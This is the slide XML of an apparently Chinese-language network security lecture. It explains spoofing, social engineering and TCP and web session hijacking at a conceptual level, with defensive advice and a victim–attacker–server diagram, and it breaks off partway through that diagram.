              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>改写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>查看页面的源文本可以发现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>SSL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>养成显式注销的习惯</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用长的会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256002" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>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E416FB0-9842-433C-A660-DA92131C0370}"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60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60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60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560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60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560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560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560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autoUpdateAnimBg="0" build="p"/>
    </p:bldLst>
  </p:timing>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8051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>从这些欺骗技术，我们可以看到</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议的脆弱性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>应用层上也缺乏有效的安全措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术含量不高，是针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中各种不完善的机制而发展起来的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>非技术性的欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>实施社会工程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>避免被欺骗最好的办法是增强安全意识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关于欺骗技术</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744821AD-82C3-4559-8510-47428584C41F}"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0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80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80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80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027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在现实环境中，比如对于银行一笔交易</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如果营业员检查了顾客的身份证和账户卡</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>抬起头来，发现不再是刚才的顾客</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>他会把钱交给外面的顾客吗？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交易</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>劫持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BEA0DC0A-6F44-49F5-AC93-87BB6A38D3B8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="257031" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1684338" y="3681413"/>
            <a:ext cx="3810000" cy="2386012"/>
            <a:chOff x="748" y="2296"/>
            <a:chExt cx="4263" cy="1503"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="257028" name="Object 4"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="748" y="2296"/>
            <a:ext cx="2400" cy="1503"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s326790" name="Bitmap Image" r:id="rId1" imgW="5353050" imgH="3352800" progId="PBrush">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Bitmap Image" r:id="rId1" imgW="5353050" imgH="3352800" progId="PBrush">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0"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2296"/>
                          <a:ext cx="2400" cy="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30" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3152" y="2704"/>
              <a:ext cx="1859" cy="1003"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>在网络上没有人知道你是一条狗</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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63171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结合了嗅探以及欺骗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>动机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对于一次性密钥不起作用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>认证协议使得口令不在网络上传输</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>找到当前活动的会话，迫使一方下线，并且把会话接管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>过来，由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>劫持者取而代之</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263170" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(session hijacking)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA3E51E9-EF6C-469B-BC2B-1D4FD30635B6}"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31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3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3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3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3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autoUpdateAnimBg="0" build="p"/>
    </p:bld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8647272" y="6407944"/>
            <a:ext cx="365760" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{44BA5A87-D79E-4899-AAAD-C1EEE89A442C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150938" y="617538"/>
            <a:ext cx="7793037" cy="860425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话劫持示意图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260104" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1541463" y="2384425"/>
            <a:ext cx="1133475" cy="1028700"/>
            <a:chOff x="521" y="2069"/>
            <a:chExt cx="1134" cy="969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="260105" name="Object 9"/>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327946" name="位图图像" r:id="rId1" imgW="1133475" imgH="1028700" progId="PBrush">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="位图图像" r:id="rId1" imgW="1133475" imgH="1028700" progId="PBrush">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0"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6" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="521" y="2750"/>
              <a:ext cx="1134"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被劫持者</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260109" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6948488" y="3429000"/>
            <a:ext cx="1655762" cy="457200"/>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服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260111" name="tower"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="2205038"/>
            <a:ext cx="576263" cy="12350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ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260114" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2339975" y="2565400"/>
            <a:ext cx="4968875" cy="431800"/>
            <a:chOff x="1474" y="1616"/>
            <a:chExt cx="3130" cy="272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260112" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1474" y="1888"/>
              <a:ext cx="3130" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260113" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1565" y="1616"/>
              <a:ext cx="2948" cy="250"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>1 A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>远程登录，建立会话，完成认证过程</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260120" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3708400" y="3357563"/>
            <a:ext cx="1657350" cy="1825625"/>
            <a:chOff x="2336" y="2115"/>
            <a:chExt cx="1044" cy="1150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="260100" name="Group 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2381" y="2296"/>
              <a:ext cx="952" cy="969"/>
              <a:chOff x="2336" y="2069"/>
              <a:chExt cx="952" cy="969"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="260101" name="Object 5"/>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327947" name="位图图像" r:id="rId3" imgW="1133475" imgH="1028700" progId="PBrush">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="位图图像" r:id="rId3" imgW="1133475" imgH="1028700" progId="PBrush">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="Picture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2" name="Text Box 6"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2336" y="2750"/>
                <a:ext cx="952" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>攻击者</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>H</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260115" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2336" y="2115"/>
              <a:ext cx="1044" cy="250"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>2 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>监听流量</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260121" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5219700" y="3500438"/>
            <a:ext cx="1944688" cy="792162"/>
            <a:chOff x="3288" y="2205"/>
            <a:chExt cx="1225" cy="499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260116" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3334" y="2205"/>
              <a:ext cx="1179" cy="499"/>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260117" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-1140646">
              <a:off x="3288" y="2251"/>
              <a:ext cx="1044" cy="250"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>3 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
